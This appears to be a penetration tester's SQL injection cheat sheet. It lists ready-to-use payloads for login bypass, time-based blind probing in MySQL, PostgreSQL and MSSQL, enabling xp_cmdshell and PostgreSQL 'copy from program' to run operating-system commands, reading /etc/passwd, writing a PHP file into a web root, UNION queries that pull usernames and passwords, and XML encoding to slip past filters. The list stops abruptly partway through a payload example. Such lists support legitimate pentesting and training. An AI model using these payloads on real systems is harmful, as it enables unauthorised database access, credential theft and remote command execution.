#### SQLi #### | https://portswigger.net/web-security/sql-injection/cheat-sheet | https://book.hacktricks.xyz/pentesting-web/sql-injection ****** Basics ****** .. code-block:: text 1 OR 1=1-- - 1' OR 1=1-- - admin'-- - | ********** Time Based ********** .. code-block:: text # MySQL 1' AND (select SLEEP(5))-- - # PostgreSQL 1';SELECT PG_SLEEP(5)-- - 1' AND 1=(select 1 from PG_SLEEP(5))-- - 1';CREATE TABLE hack(a text);copy hack from program 'sleep 10';DROP TABLE IF EXISTS hack;-- - # MSSQL 1' WAITFOR DELAY '0:0:10'-- - 1';WAITFOR DELAY '0:0:10'-- - 1'; EXEC sp_configure 'show advanced options', 1 ; EXEC sp_configure 'xp_cmdshell', 1 ; RECONFIGURE ; EXEC xp_cmdshell 'ping 192.0.2.1 -n 1 -w 10000' -- - 1'; EXEC sp_configure 'show advanced options', 1 ; EXEC sp_configure 'xp_cmdshell', 1 ; RECONFIGURE ; EXEC xp_cmdshell 'powershell -c "Start-Sleep -Seconds 10"' -- - | ********** Read/Write ********** .. code-block:: text # MySQL select load_file('/etc/passwd'); select '' into OUTFILE '/var/www/html/test.php' | ***** Union ***** .. code-block:: text 1' Union Select 'aaa','bbb','ccc','ddd','eee' -- - ' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT 'abc',NULL,NULL-- ' UNION SELECT username, password FROM users-- ' UNION SELECT NULL,username||'~'||password FROM users-- # MySQL Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables | ************ XML Encoding ************ | You can convert chars to xml references such as numerical or hexadecimal values .. code-block:: bash # Hex echo -n 's' | xxd -plain | sed 's/\(..\)/\&#x\1;/g' echo -n 's' | python3 -c 'import sys;[print(f"&#x{ord(char):x};",end="") for char in sys.stdin.read()]' # Dec echo -n 's' | python3 -c 'import sys;[print(f"&#{ord(char)};",end="") for char in sys.stdin.read()]' # Example: s == s == s | | Payload example .. code-block:: text 1 union select NULL